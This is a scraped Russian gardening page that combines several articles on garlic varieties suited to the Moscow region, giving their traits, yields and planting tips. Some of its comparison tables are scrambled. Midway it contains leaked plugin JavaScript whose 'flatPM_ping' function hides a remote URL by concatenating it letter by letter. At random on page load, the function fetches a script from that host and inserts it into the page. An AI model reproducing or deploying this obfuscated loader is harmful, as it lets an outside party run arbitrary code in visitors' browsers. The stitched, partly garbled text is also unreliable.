8 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Какой сорт чеснока выбрать для подмосковья

Какой сорт чеснока выбрать для Подмосковья

Чеснок пользуется заслуженной популярностью благодаря своим вкусовым качествам и антибактериальному действию. Эта культура имеет множество видов, качество урожая которых зависит от условий выращивания. Сорта чеснока для Подмосковья должны обладать хорошей устойчивостью к заморозкам и повышенной влажности.

Сорт чеснока для Подмосковья

Среди разных видов для этого региона традиционно больше подходят озимые сорта. Однако также можно подобрать и яровой чеснок, руководствуясь общими характеристиками культуры.

Выращивание в Подмосковье

Выращивание любой овощной культуры подразумевает наличие подходящих условий для высадки. Вид культуры подбирается под климатические особенности региона.

Озимый чеснок для Подмосковья должен иметь хорошую холодоустойчивость, поскольку в этом регионе наблюдается промерзание почвы. В свою очередь яровой вид следует подбирать с учетом высокой влажности воздуха. В то же время ближе к августу в этом регионе может наблюдаться засушливая погода, что тоже следует учитывать.

В качестве посадочного материала лучше всего использовать результаты отечественной селекции. Как правило, они отличаются простотой в уходе. Кроме того, такие виды хорошо переносят холода и засуху, в отличие от зарубежных аналогов.

Озимые сорта

Этот подвид чеснока характеризуется посадкой под зиму, в последние полтора месяца осени. К положительным качествам можно отнести высокую урожайность и неприхотливость. Однако такой чеснок имеет плохую лежкость. Как правило, его употребляют в еду сразу после выращивания и редко делают закладку на зиму. Для Подмосковского региона подходят несколько озимых видов.

Подмосковский

Этот вид был специально выведен для выращивания в умеренных климатических условиях. Основные его характеристики:

  • форма луковицы полукруглая;
  • головка покрыта чешуйками кремового цвета с фиолетовыми прожилками;
  • средняя масса – 60 г;
  • наличие стрелки.

Подмосковский чеснок подходит для выращивания как на частных участках, так и в промышленных масштабах. Высаживание следует проводить за месяц до полного промерзания грунта.

В одной головке содержится от 5 до 7 долек. Мякоть имеет сильно выраженный острый вкус. Количество урожая – 1,2 кг с 1 м². Срок хранения урожая – 5-6 месяцев.

Грибовский

Этот сорт условно делят на два подвида – Грибовский Юбилейный и Грибовский-60.

Юбилейный

Юбилейный чеснок имеет такое описание:

  • масса головки – 60 г;
  • стрелкующийся вид;
  • зубки покрыты красноватой шелухой с лиловым оттенком;
  • форма долек – плоскоокруглая;
  • вкус ярко выраженный, острый.

Чеснок отличается по форме и вкусу

Этот вид относится к скороспелым. В одной луковице количество зубков колеблется от 7 до 10 штук. Урожая с 1 м² достигает 2 кг. Срок хранение – 5 месяцев.

Грибовский-60

Характеристика Грибовского-60 следующая:

  1. Масса головки – 40 г.
  2. Во время выращивание начинает стрелковаться.
  3. Дольки покрыты чешуйками кремово-фиолетового оттенка.
  4. Форма зубков – плоскоокруглая.
  5. Вкус полуострый.

Грибовский вид считается среднеспелым. Количество долек в головке достигает 12 штук. Урожай с 1 м² обычно не превышает 1,5 кг. Срок хранения – 4-5 месяцев. Отличительная черта этой разновидности – хорошая устойчивость к бактериальным заболеваниям.

Этот вид является плодом работы российских и белорусских ученных. Отличительными чертами культуры считаются:

  • плоская головка;
  • луковица покрыта шелухой темно-кремого оттенка;
  • плотная мякоть с полуострым вкусом;
  • средний вес луковицы – 45 г.

Союз имеет мощное строение листа. Одна головка имеет 7-9 листьев с длиной до 35 см. На 1 м² приходится,7 кг чеснока. Количество долек в головке колеблется от 5 до 9 штук. Эту разновидность культуры относят к среднепоздним.

Этот вид популярен из-за стабильного урожая и хорошей устойчивости ко многим болезням. Также Союз неприхотлив и хорошо переносит заморозки. Срок хранения – 4-5 месяцев.

Яровой чеснок

Яровой чеснок хорошо хранится

Этот вид культуры дает хороший урожай при высадке в весеннее время. Такой чеснок не всегда продуктивен, количество луковиц уступает озимым сортам.

Однако при этом яровые виды отличаются продолжительностью хранения. Они также лучше переносят транспортировку и смену климатических условий. Существует несколько разновидностей чеснока, которые подходят для посадки в Подмосковье.

Дегтярский

Название этой разновидности связано с Дегтярской селекционной станцией. Изначально этот вид был выведен для высаживания на малых площадях, однако со временем сорт начали использовать в промышленных масштабах. Дегтярский чеснок обладает такими характеристиками:

  • узкие листья, высота которых равна 40 см;
  • нестрелкующийся вид;
  • листва покрыта слабым восковым налетом;
  • луковицы имеют грушевидную форму и покрыты белыми чешуйками с красным оттенком;
  • масса головки достигает 40 г.

Количество зубков в одной луковице колеблется от 16 до 18. Мякоть Дегтярского вида имеет полуострый вкус. Луковицы считается среднеспелыми.

Урожай с 10 м² обычно достигает 3 кг. Срок хранения чеснока – 7 месяцев.

Московский

Этот сорт был выведен для посадки в средней климатической полосе. Характеристика чеснока включает в себя такие качества:

  • форма луковиц – округлая и приплюснутая;
  • зубчики покрыты белым чешуйками с фиолетовыми прожилками;
  • средняя масса головки – 15 г;
  • листья вида достигают высоты 30 см.

Московский сорт характеризует слабоострый чесночный вкус. Среднее количество урожая достигает 2,4 кг 10 м². Размножение вида проводится с помощью зубчиков.

Культуру относят к среднеспелым. Срок хранение – 6-7 месяцев.

Гулливер

Этот вид занимает лидерские позиции среди яровых сортов. Описание этой культуры включает в себя такие качества:

  • листья покрыты слабым восковым налетом и достигает 55 см в высоту;
  • сорт является стрелкующимся;
  • вес головок по официальным данным достигает 120 г, но при правильном уходе можно добиться 250 г;
  • луковицы покрыты серо-белыми чешуйками.

Количество зубков в одной головке варьируется от 3 до 5 долек. Этот вид считается высокоурожайным и подходит для открытого типа выращивания.

Примечательной особенностью является устойчивость Гулливера ко многим болезням. Срок хранения урожая – 8 месяцев.

Лучшие сорта озимого чеснока для Подмосковья: Госсреестр в помощь

Дачнику на заметку, фермеру в помощь: новые и проверенные, урожайные и районированные сорта озимого чеснока для Подмосковья. Как выбрать чеснок для Средней полосы России, описание отечественных и зарубежных сортов, фото.

Сорта озимого чеснока для Подмосковья: тонкости выбора

Различают стрелкующиеся и не стрелкующиеся виды озимого чеснока. Первый вид выбрасывает стрелки с воздушными луковицами, несущих 2-6 штук зубцов. Не стрелкующийся образует многозубые луковицы с расположенными по спирали (чуть находящими друг на друга) средними многочисленными зубцами.

На фото озимый чеснок Надежный, пригоден для выращивания в Подмосковье.

Не стрелкующиеся сорта чеснока отличаются более ранним созреванием – срок вегетации 75-80 дней, стрелкующиеся сорта – более длинным, до 100-12 дней.

При выборе сорта ориентируется на следующие качества:

  1. Невысокая скороспелость: сорта с коротким вегетационным периодом в условиях поздней весны с вероятностью возвратных заморозков подмерзают. Лучший выбор – сорта средне-ранние, средне-поздние, поздние.
  2. Высокая морозостойкость, зимостойкость.
  3. Плотность кроющих чешуй, высокое содержание сухих веществ, эфирных масел, определяющих высокую лежкость.

Озимый чеснок для Подмосковья: лучшие сорта, характеристика и описание

Из проверенных временем и садоводами: Подмосковный, Комсомолец, Брянский местный, Грибовский Юбилейный и другие.

В описании они не нуждаются – их знают, их выращивают. На какие сорта чеснока для Подмосковья местной селекции, рекомендованных для приусадебного выращивания и фермерского, а также зарубежные, стоит обратить внимание – описание, характеристика, фото.

Алькор

Внесен в Госреестр в 1997 г, получен в Новосибирском ФГБНУ, рекомендован для выращивания в Западной Сибири, прижился и в Подмосковье.

На фото сорт озимого чеснока Алькор.

Стрелкующийся среднеранний сорт, срок вегетации 97-100 дней. Головки весом 25-35 г сиреневого оттенка с темными штрихами состоят из 5-6 зубков. Урожайность до 3 кг м/2 и выше, промышленная продуктивность 3-3.5 т/га. Вкус яркий, острый, пряный. Используется на промпосадках, в приусадебном хозяйстве.

Зубренок

Размер и продуктивность – вот чем хорош Зубренок. Оригинатор ФГБНУ Федерального Научного Центра Овощеводства.

Сорт чеснока Зубренок: крупный, с крупным зубцом – настоящий чесночный зубр.

Среднеранний сорт с красивой округлой головкой с 4-6 крупными зубцами, кроющими чешуями, средней массой луковиц 50-72 г. В Госреестре с 2003 г, рекомендован для всех регионов. Период вегетации 87-100 дней.

Отличается высокой лежкостью, устойчивостью к фузариозу, мягким средне-острым вкусом. Продуктивность сорта Зубренок 1.2 кг/м2, что позволяет использовать на коммерческих плантациях. Устойчив к фузариозу, хладостойкий.

Герман

Ранний сорт включен в Госреестр в 2005 г, оригинатор ФГБНУ Федерального Научного Центра Овощеводства.

Сорт чеснока Герман: и для продажи, и для себя.

Среднеспелый озимый сорт с плоско-округлой луковицей весом до 50 г в средней массе, крупным зубком (6-7 штук), покрытой сиреневыми чешуями.

Средняя урожайность – до 1 кг/м2, компенсируется сроком хранения до 8 месяцев и 90% сохранностью продукции, что позволяет вводить сорт в линейку товарных.

Елизар

Новинка от ФГБНУ Федерального Научного Центра Овощеводства (Московская обл., Одинцовский р.-н.), в Госреестре с 2017 г.

Отличился сорт размером плоско-округлой луковицы – 55-66 г,с крупными зубками (5-7 шт.), привлекателен белым цветом чешуй.

Заявленная урожайность 1.1 кг/м2, зимостойкость позиционируется как хорошая, сроки хранения для озимого – неплохие: 6 месяцев.

Любаша

Знаменитый сорт озимого чеснока украинской селекции с чуть приплюснутой светлой луковицей с тонкими фиолетовыми прожилками.

Сорт Любаша – чеснок больших размеров и больших площадей.

Вес луковиц до 120 г, количество зубков – в среднем 4-7, урожайность 2.3-3.4 кг/м2. Период созревания до 115-120 дней.

Вкус острый, яркий, насыщенный, лежкость от умеренной до высокой. Используется на коммерческих площадях, пригоден к машинной уборке, любим дачниками.

Морадо

Испанский сорт, тот самый “сиреневый чеснок”, занявший на родине половину коммерческих посадок, один из распространенных в Европе.

Тот самый чеснок Морадо, сиреневый испанский.

Шаровидные головки покрыты белыми чешуями, иногда с нежно-лиловыми прожилками, несут 8-12 зубков. Хорошей лежккости, мягкого вкуса с чрезвычайно интенсивным ароматом, за что и ценится.

Зимостоек, засухоустойчив – несмотря на испанское происхождение, выращивается в Подмосковье и не только на коммерческих площадях, дачниками.

Добрыня

В Госреестре с 2002 г. Распространен широко благодаря весу луковиц округлого цвета со светло-серыми чешуями – до 60 г, размеру крупных зубцов (10-12 шт.), мягкому вкусу и хорошему аромату – превосходен в консервировании.

Чеснок Добрыня: название оправдывает – очень крупный, мощный и – с мягким неострым вкусом.

Лежкость до 6 месяцев при сохранности 80%.

Кавалер

В Госреестре с 2017 г, заявитель ООО Премиум Сидс, Московская обл., г. Одинцово. Среднеспелый стрелкующийся сорт признан годным для выращивания в ЛПХ.

Настоящий кавалер – нарядный, аккуратный, с мягким полуострым характером.

Радует размером – масса округло-плоских головок 65-85 г с количеством зубков 8-12, урожайностью 2-3 м2, высокой зимостойкостью. Окраска чешуй белая, вкус полуострый, мягкий.

Назус

В Госреестр внесен в 2003 г, оригинатор ЗАО Овощевод (г. Екатеринбург). Рекомендован сорт Назус для ЛПХ, малого коммерческого производства, для фермерских хозяйств.

Назус – крупный, товарный, производительный.

Ценится за размер выровненных, правильной формы округло-плоских луковиц весом до 65 г, за крупный зубок (6-7 шт.), мягкий среднеострый вкус, товарный вид и зимостойкость. Окраска чешуй – бело-фиолетовая, урожайность 1.1 м2.

Сорта озимого не стрелкующегося чеснока

Садоводу и фермеру пригодятся и не стрелкующиеся сорта как московской селекции, так и зарубежной.

Лекарь

В Госреестре с 1999 г, оригинатор ФГБНУ ВНИИ РИСА. Ранний не стрелкующийся сорт с белыми чешуями родом с Кубани имеет луковицу до 36-45 г и до 80 г с 6-8 зубками, мягкий не острый вкус, выраженный аромат.

Чеснок Лекарь показывает неплохую лежкость до 6-7 месяцев при сохранности до 60%, хорошую транспортабельность, урожайность до 1.5 кг/м2, 8-10 т/га. Вегетационный период 100-108 дней.

Гермидор

Француз, победивший русские сорта – многие: получен компанией IMRA в 1979 г, не стрелкующийся, с круглой внушительных размеров луковкой до 120 г – самый крупный чеснок французской селекции с небольшими зубчиками – 14-18 штук, расположенными в три ряда: крупные снаружи, помельче – внутри.

Гермидор, русской зимы не боящийся, урожайный и вкусный.

Не стрелкуется, формируя у основания псевдостебля 1-2 воздушных луковички. Адаптирован к русской зиме, к континентальному климату, почему и прижился в Подмосковье. Продуктивен, лежкий: хороший вариант для фермера и дачника.

Мессидор

Ранний сорт французской селекции с мягким вкусом и крупной товарного вида головкой до 100 г (8-15 зубчиков), белыми с легкой желтизной чешуями, пригоден для выращивания в Средней полосе.

Знаменитый чеснок Мессидор.

Зимостоек, несмотря на ранние сроки созревания, весьма продуктивен, лежкий. Стрелку не формирует – иногда образует посреди псевдостебля, вблизи основания стрелки, пару луковичек. Зимостоек, засухоустойчив, истинно товарный сорт.

Список можно продолжать долго – и дополнять, исключать, корректировать описание. А какие сорта озимого чеснока выращиваете вы?

Подмосковные сорта озимого чеснока – какую культуру выбрать для собственной грядки

Растение чеснок – популярный овощ, древнейшая огородная культура, которая выращивается человекам. Он богат витаминами, аминокислотами, ценным микро- и макроэлементным составом, содержит углеводы, белки и эфирное масло аллицин. Используется в кухнях всех стран мира, применяется в качестве пряности для блюд и консервирования, является важнейшим компонентом рецептов народной медицины. Посадка чеснока во многом зависит от региона, состава почвы и климатических условий. Подмосковные сорта озимого чеснока – это холодоустойчивые культуры, которые дают высокую урожайность в средней полосе России.

Виды чеснока

Селекционеры и огородники различают два основных вида чеснока, который можно высаживать в Подмосковье, – яровой и озимый.

Каждый вид имеет множество сортов, что в свою очередь делятся на стрелкующийся и нестрелкующийся. Особенности посадки ярового и озимого чеснока для Подмосковья:

  • Озимые виды следует сажать за полтора месяца до наступления устойчивых морозов. Для Подмосковья это период с последней декады сентября по первые 10 октябрьских дней.
  • Яровой чеснок лучше высаживать в регионах с теплым летом, чтобы луковицы успели хорошо вызреть. Для ярового вида можно высаживать нестрелкующиеся сорта, для озимого – культуры со стрелками.
  • Чеснок в зиму высаживают, соблюдая правила: за 15-20 дней до посадки семенной материал помещают в холодное место, за день до посадки отобранные зубки без дефектов намачивают водой или 0,1%-ным медно-марганцево-борным раствором.
  • Посевной материал для ярового и озимого вида культуры тщательно калибруют – отбирают только здоровые зубки одинакового размера без видимых изъянов. Выращивание чеснока бульбочками, воздушными луковицами, используется для улучшения качества сорта. На следующий год бульбочки дают однозубковый севок.

В Подмосковье озимые сорта высаживают на глубину не менее 6 сантиметров (зубчики) и около 3-4 сантиметров (бульбочки). Грядку под зиму вскапывают за месяц до посадки, вносят удобрение – компост, навоз, перегной. От правильной заделки лунок и ухода зависит урожайность и устойчивость сортов к морозам. Следует выбирать почву, на которой до посадки культуры росли бобовые, огурцы, зелень или томаты.

Борозды для лунок располагают на расстоянии 20-35 см, а зубки укладывают через каждые восемь-десять сантиметров.

Мульчирование – поверхностное покрытие почвы – выполняют через две недели. За это время корневая система посадочного материала успевает окрепнуть и адаптироваться к условиям. Грядку с озимыми сортами присыпают тонким слоем удобрения – навоза, торфа, перегноя, оставляют зимовать.

Районированные чесночные культуры

Для средней полосы России с умеренным климатом и собственно, для Подмосковья, на зиму выбирают холодоустойчивые сорта. Посевной материал должен быть крепким, чтобы выдержать минусовую температуру и промерзание. Зарубежные виды более теплолюбивые, они с большим трудом смогут адаптироваться к холодной российской зиме в Подмосковье. Поэтому лучше выбирать для выращивания отечественные культуры. За ними требуется более простой уход и привычное удобрение почвы. Наиболее популярные озимые сорта чеснока:

  • Даниловский местный,
  • Подмосковный,
  • Отрадненский,
  • Комсомолец,
  • Грибовский 60,
  • Лекарь,
  • Новосибирский,
  • Зубренок,
  • Широколистный 220,
  • Брянский местный,
  • Брейтовский яровой,
  • Грибовский юбилейный,
  • Южный фиолетовый,
  • Надежный.

Сорта хорошо подходят для выращивания в Подмосковье, дают высокую урожайность, чесночные луковицы крупные, при хорошем посевном материале и правильном уходе размер головок бывает больше кулака.

Одноименный вид для региона

Подмосковный сорт озимого чеснока – самый подходящий для российской средней полосы и Подмосковья. С 2002 года включен в государственный реестр овощных культур. Рекомендуется выращивание культуры в фермерских хозяйствах и посадка на огородах. Описание:

  • среднеспелый;
  • стрелкующийся;
  • созревание – 95-110 дней;
  • луковица плоскоокруглой формы;
  • средний вес – 60 граммов;
  • зубки – от 5 до 7 штук;
  • урожайность – до 2-х кг на кв.метр;
  • лежкость – полгода;
  • высокая зимостойкость;
  • острый вкус и выраженный аромат.

Для Подмосковного сорта характерны светлые чешуйки с фиолетовыми прожилками. Посадка выполняется осенью на глубину лунки от 6 до 8 см от поверхности почвы. Оптимальное время высадки – с 20-х чисел сентября. После полного вызревания можно использовать для приготовления пищи и консервирования.

Грибовский 60 и Юбилейный сорта

Популярный озимый чеснок для Подмосковья. Юбилейный относится к среднеспелым, а Грибовский 60 – к раннеспелым сортам. Сравнительная таблица:

Шестидесятый Юбилейный
По созреванию Ранний Средний
Сроки созревания 87-98 дней 83-122 дня
Характеристика Стрелкующийся Стрелкующийся
7-11 штук Вес головки 40-60 г 22-40 г
Плоскоокруглая Вкус Острый Средне острый
6-8 см Посадка в междурядьях 30 см 25-30 см
10-15 см Урожайность, кв.м До 2-х кг 1,3-1,7 кг
Красноватая с лиловой

Сорт чеснока Комсомолец хорошо растет на открытой местности в Подмосковье при ярком освещении, любит легкую суглинистую почву, не требует сложного ухода. Желательно выбирать участки для посадки, где предшественниками были бобовые культуры, огурцы и капуста, вносить органическое удобрение.

Среднеспелые подмосковные виды

Чтобы получить высокую урожайность чеснока, стоит выбирать неприхотливые растения и обеспечивать должный уход. Они самые приспособленные к типу суглинистой малочерноземной почвы Подмосковья и быстрее адаптируются к климатическим условиям. Высокоурожайные среднеспелые сорта, какие характерны для региона, – Зубренок, Лекарь, Надежный, Новосибирский.

Ссылка на основную публикацию
Adblock
detector
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Зубренок Надежный Масса луковицы, г 120 20-25
Округлая Округлая Урожайность, кг/кв.м 2,8-3,4 1,04
4-6 6-7 Созревание, дней 118 75-81
Высокая Очень высокая Устойчивость Зимостойкость К фузариозу
Полуострый Острый

Популярные местные сорта

Урожайность чесночных луковиц зависит от адаптации к почве и климату. Беспроигрышный вариант – выращивание местных сортов. Какие виды рекомендуются для Подмосковья:

  • Брянский местный нестрелкующийся сорт чеснока. Слабоострый яровой, который в Подмосковье не высаживают в зиму, но популярный среди дачников. Имеет луковицу округло-плоской формы массой до 50 г с большим количеством зубков.
  • Среднеспелый Дунганский местный, не яровой. Крупные луковицы по 30-50 г. Количество зубков – от двух до девяти, средняя лежкость. Округло-плоская форма луковицы с фиолетовыми чешуйками.
  • Вятский стрелкующийся озимый сорт чеснока. Луковица массой 60 г с количеством зубков до девяти штук. Имеет острый вкус, чешуйки окрашены в фиолетовый цвет с оттенком сиреневого.

Это лучшие сорта чеснока для почв Подмосковья. Большую популярность также имеет озимый сорт Лекарь. Он отличается ранним созреванием, отсутствием стрелки и белым цветом сухих чешуек. Масса луковицы достигает 50 граммов, зубков – 11-16 штук. Вкус полуострый, хорошо используется в кулинарии благодаря приятному аромату. Обладает неплохой лежкостью – до семи месяцев. Хорошо переносит зиму, транспортабельный, дает урожай чуть больше килограмма на квадратный метр.

Популярность чеснока сложно переоценить. Культура распространена повсеместно, но для каждого региона подходит свой перечень озимых видов, на некоторых почвах лучшую урожайность дает исключительно яровой чеснок. В Подмосковье почва пестрая: суглинки, галечники, лесные серые, болотные, заболоченные, песчаные и самые плодородные черноземные на юге региона. Сорт озимого чеснока нужно выбирать не только по характеристикам культуры, но и по составу почвы, в которой растение будет выращиваться.

Сорта озимого чеснока для средней полосы России

Мы уже не раз обращались к теме посадки озимого чеснока. Все уже было подробно описано, нюансы разобраны. Но ни в одной заметке еще ни разу не говорилось о названиях лучших сортов озимого чеснока для средней полосы России. Исправляем это упущение.

Читают на Дача6.ру:

Озимый чеснок сажают осенью, незадолго до наступления заморозков. Как я уже неоднократно отмечал, наш примерный ориентир — Покров. Головки имеют четкую структуру, зубцы располагаются вокруг центрального стебля. Посадочный материал обычно хорошо укореняется и без проблем зимует. Еще одно преимущество по сравнению с яровым чесноком – лучшая устойчивость к заболеваниям. Сбор урожая происходит в конце июля. Он хорошо хранится до середины зимы.

Все сорта озимого чеснока можно условно подразделить на стрелкующиеся и нестрелкующиеся. Первые дают цветоносы, на которых формируются воздушные луковички. Они позволяют время от времени обновлять посадочный материал, не давая ему вырождаться. Нестрелкующийся чеснок, как правило, имеет более короткий период вегетации – всего 75-90 суток, а не 110-120 дней.

Рассмотрим лучшие сорта озимого чеснока, имеющиеся в продаже:

  • «Любаша» — сорт относительно новый, но уже успевший завоевать широкую популярность у российских дачников. Он сочетает в себе высокую урожайность (до 3,5 кг с 1 м2), терпкий острый вкус, хорошую лежкость, неприхотливость (не боится морозов и засухи) и устойчивость к болезням. Сорт стрелкующийся. Период вегетации – около 120 дней. Головки по 80-90 г, отдельные экземпляры – до 120 г. В каждой формируется по 4-7 зубчиков.
  • «Добрыня» тоже широко распространен на загородных грядках. Длительность вегетации составляет 130 дней. Головки весят меньше, чем у «Любаши», при этом в них гораздо больше зубчиков – до 12 штук. Данный сорт не слишком острый, хорошо подходит для использования в зимних консервациях. Лежкость собранного урожая – до 6 месяцев.
  • «Мессидор» — популярный нестрелкующийся раннеспелый озимый чеснок от французских селекционеров. Вес головок – до 70-100 г, каждая содержит по 8-15 зубчиков. Вкус мягкий, умеренно острый. Среди преимуществ – ранние сроки созревания, устойчивость к болезням, отличные товарные качества.
  • «Гермидор» — еще один француз с русской душой. Как и его собрат «Мессидор», не стрелкуется. Округлые луковицы отличаются своими размерами. Их вес достигает 120 г, в каждой содержится по 10-18 зубков. Несмотря на европейское происхождение «Гермидор» даже в холодные малоснежные зимы чувствует себя по-свойски, как дома, а не в гостях.
  • «Морадо». Не спешат сдавать российский рынок на откуп неугомонным французам темпераментные испанцы. Они наносят последним сокрушительный удар, представив в России свою новинку – умеренно острый, невероятно ароматный сорт «Морадо». Тот, кто пробовал выращивать его на своих грядках, вряд ли в дальнейшем откажется от повторения этой затеи. Шаровидные головки средних размеров содержат внутри по 8-12 зубков. При этом перед Вами не какая-нибудь южная неженка, а настоящий неприхотливый мачо, уверенно преодолевающий как суровые морозы, так и испепеляющую жару, усугубляемую продолжительной засухой.
  • «Комсомолец» подойдет тем, кто ценит в чесноке терпкий аромат и острый вкус из разряда «Москву увидеть и не забыть». Сбитые и очень плотные плоскоокруглые луковицы весят немного – около 30 г. В каждой содержится по 8-13 зубчиков. Сорт стрелкующийся, холодостойкий, со средними сроками созревания (около 120 дней).
  • «Харьковский», как и «Комсомолец», славится своей остротой и оправдывает характерный колорит и традиции (острый душистый чесночек отлично сочетается с нежным аппетитным салом). Внутри каждой 40-50 г луковицы присутствует по 4-6 зубков. Период вегетации этого среднеспелого стрелкующегося сорта составляет около 115 суток. Отдельно стоит отметить очень продолжительную лежкость собранного урожая без потери качества.
  • «Софиевский» — еще один популярный стрелкующийся морозостойкий сорт от украинских селекционеров, пользующийся заслуженной славой у российских дачников. Выведен он был более 25 лет назад. Уверенно держит морозы до -35 C зимой и жару до +45 C летом. Рекордсмен по длительности хранения – до 12 месяцев. Вес головок – от 30 до 100 г. В каждой присутствует в среднем по 7-9 зубков.
  • «Петровский» острый высокоурожайный сорт с хорошей лежкостью. Средний вес плоских головок составляет 75 г. В каждой находится по 6-8 плотных зубчиков. Важное качество – повышенная устойчивость к грибковым заболеваниям.
  • «Алексеевский» подойдет тем дачницам, для которых размер имеет значение. Вес одной головки доходит до рекордных 180 г. Сорт стрелкующийся, поэтому может быть размножен воздушными луковичками, что важно для сохранения выдающихся потребительских качеств. Сладковато-острый вкус гармонично дополняет нежный душистый аромат. Несмотря на внушительные размеры, каждая головка содержит всего по 4-5 продолговатых зубцов. Сорт «Алексеевский» хорошо хранится до будущей весны и практически никогда не болеет.

А какие озимые сорта чеснока предпочитаете выращивать Вы на своих загородных участках? Поделитесь мнением в комментариях.

Выращивание озимого чеснока в Подмосковье – правильно выбираем сорта

Чеснок – самая популярная овощная культура, которая выращивается во многих уголках планеты. Многолетнее растение с острым вкусом и характерным чесночным запахом. Чеснок особо чувствителен к изменениям среды выращивания, как следствие, тяжело приспосабливается к смене климатической зоны. Поэтому, при выборе посадочного материала, следует отдавать предпочтение районированным видам, то есть адаптированным к местным условиям произрастания.

Важно помнить, что чеснок очень требовательно относится к региональным климатическим условиям и особенностям почвы.

Озимый чеснок – как выбрать сорт для посадки под зиму

В Государственный реестр селекционных сельскохозяйственных растений включены два главных вида чеснока, которые можно с успехом культивировать в Подмосковье – яровой и озимый. Озимый чеснок – высокоурожайный, но плохо хранится. Яровой — менее продуктивный, но более лежкий.

При подзимней посадке отлично развиваются оба вида, но озимые сорта чеснока являются более урожайными. При весенней посадке картина диаметрально противоположная – яровой чеснок дает хороший урожай, а из озимого вырастает однозубковая головка.

Все виды озимого чеснока разделяются на стрелкующиеся и нестрелкующиеся. Их легко можно отличить, по таким признакам:

  • у стрелкующегося вида чеснока головка состоит из одного кольца крупных зубков, количество которых варьируется от 4 до 12 штук;
  • луковица нестрелкующегося сорта состоит из большого количества мелких зубков (14-30 штук), располагающихся по спирали.

Преимущества стрелкующегося чеснока:

  • высокая морозоустойчивость;
  • большое содержание эфирных масел;
  • на стрелке вырастает крупное соцветие с воздушными семенами-бульбочками, которые можно использовать в качестве посадочного материала. На каждом растении их вырастает около 100-150 штук, что позволяет значительно сэкономить на посадочном материале.
  • стрелки имеют характерный чесночный привкус и аромат, благодаря чему их также можно употреблять в пищу.

Стрелки необходимо своевременно удалять, так как опоздание приводит к снижению урожайности (до 30%). Нестрелкующийся сорт удобен тем, что отсутствует необходимость избавляться от стрелок.

Для Подмосковья необходимо подбирать холодоустойчивые сорта озимого чеснока, которые смогут выдержать низкие температуры и промерзание почвы.

Лучше всего подбирать посадочный материал отечественной селекции, отличающиеся неприхотливостью и простотой в уходе. Зарубежные виды более теплолюбивые, вследствие чего плохо приспосабливаются к холодной зиме подмосковных регионов.

Лучшие районированные сорта озимого чеснока

Наиболее адаптированными к климатическим условиям средней полосы России, в частности Московской области, являются такие озимые сорта чеснока:

  1. Подмосковный.
  2. Грибовский-60.
  3. Грибовский юбилейный.
  4. Союз.
  5. Озимый комсомолец.
  6. Новосибирский.
  7. Зубренок.
  8. Надежный.

к оглавлению ↑

Подмосковный

Данный сорт озимого чеснока предназначен для выращивания в условиях умеренного климатического пояса. С успехом культивируется, как на частных приусадебных участках, так и в фермерских хозяйствах. Подмосковный относится к озимым, стрелкующимся видам чеснока. Высаживается под зиму (за 3-4 недели до устойчивого промерзания почвы). Имеет такие характерные особенности:

  • среднеспелый срок созревания (95-112 дней);
  • форма головки – плоскоокруглая;
  • цвет луковицы – светло-кремовый с сине-фиолетовыми прожилками;
  • средняя масса – 60 грамм;
  • количество зубков в головке – 5-7 штук;
  • средняя масса зубчиков – 9-12 грамм;
  • урожайность (на м 2 ) – 1,6-2,0 кг;
  • лежкость – около 6 месяцев (сохраняется до 90 % урожая);
  • высокая морозоустойчивость;
  • острый вкус и резкий аромат.

к оглавлению ↑

Грибовский

Грибовский — популярный озимый сорт, культивируемый в Подмосковье. Существуют две разновидности сорта: Грибовский Юбилейный и Грибовский-60, которые имеют такие отличительные особенности:

Характеристики Грибовский 60 Грибовский юбилейный
Созревание скороспелый среднеспелый
Сроки 86-97 84-121
Вид стрелкующийся стрелкующийся
Количество зубков в головке 7-10 8-12
Вес луковицы 40-65 25-45
Форма головки плоскоокруглая плоскоокруглая
Вкусовые качества острый полуострый
Глубина посадки 5-8 см 4-6 см
Посадка (ширина междурядий) Около 30 см 25-30 см
Урожайность (м 2 ) около 2-х кг 1,3-1,7 кг
Цвет чешуек красно-лиловый кремово-фиолетовый

В целом, сорт Грибовский (юбилейный и 60) отлично противостоит разнообразным бактериальным инфекциям луковицы. При правильном уходе можно получить большой урожай ( до 3-х кг/м 2 ).

